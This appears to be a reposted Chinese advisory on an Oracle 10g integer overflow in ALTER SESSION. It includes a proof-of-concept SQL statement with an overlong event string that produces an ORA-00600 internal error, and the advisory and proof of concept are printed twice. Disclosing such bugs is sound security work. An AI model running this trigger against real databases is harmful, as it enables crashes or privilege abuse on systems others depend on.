Oracle 10g更改会话整数溢出漏洞
2006-08-01 12:12
288 查看
Oracle在处理更改会话操作时存在整数溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
仅拥有SELECT权限的用户可以通过提交超长的alter session请求来触发这个漏洞,导致在数据库中执行任意命令。
测试方法:
以仅有CREATE SESSION权限用户的身份连接到数据库。
SQL> alter session set events '10046 trace name context forever, level 16';
Session altered.
SQL> alter session set events
'10046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004610046100461004610046100461004610046
100461004610046100461004610046100461004610046100461004610046100461004610
046100461004610046100461004610046100461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004610046100461004610046100461004610046
100461004610046100461004610046100461004610046100461004610046100461004610
046100461004610046100461004610046100461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
00461004610046trace
name context forever, level 16';
ERROR:
ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [],
[]
目前厂商还没有提供补丁或者升级程序
仅拥有SELECT权限的用户可以通过提交超长的alter session请求来触发这个漏洞,导致在数据库中执行任意命令。
测试方法:
以仅有CREATE SESSION权限用户的身份连接到数据库。
SQL> alter session set events '10046 trace name context forever, level 16';
Session altered.
SQL> alter session set events
'10046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004610046100461004610046100461004610046
100461004610046100461004610046100461004610046100461004610046100461004610
046100461004610046100461004610046100461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004610046100461004610046100461004610046
100461004610046100461004610046100461004610046100461004610046100461004610
046100461004610046100461004610046100461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
004610046100461004610046100461004610046100461004610046100461004610046100
461004610046100461004610046100461004
610046100461004610046100461004610046100461004610046100461004610046100461
00461004610046trace
name context forever, level 16';
ERROR:
ORA-00600: internal error code, arguments: [300], [985], [], [], [], [], [],
[]
目前厂商还没有提供补丁或者升级程序
相关文章推荐
- 从oracle 10g转到oracle 11g更改字符集
- EXP-00056 遇到oracle错误1455 ORA-01455: 转换列溢出整数数据类型
- 4.漏洞验证系列--MS15-034 HTTP协议栈整数溢出
- Oracle 10g更改默认端口号,监听器加密,限制ip访问
- Linux Kernel 整数溢出漏洞
- 有关Oracle 10g 更改字符集的问题
- 整数溢出漏洞小结
- PHP5.2下chunk_split()函数整数溢出漏洞 分析
- 使用Oracle 10g中的等待界面诊断性能问题(查询会话等待,查询慢的现象)
- Apache Qpid 整数溢出漏洞
- 整数溢出漏洞
- ClamAV堆溢出及整数溢出漏洞
- oracle 10g 如何更改端口号
- Mozilla Firefox 3.6 WOFF解码器整数溢出漏洞
- 更改Oracle 10G归档日志目录
- 整数溢出漏洞攻击
- CVE-2014-6332浅析-Internet Explorer整数溢出漏洞
- 导出遇到 ORACLE 错误 1455:转换列溢出整数数据类型
- Linux Kernel kNFSd 整数溢出 拒绝服务漏洞
- oracle 10g更改用户名称的操作方法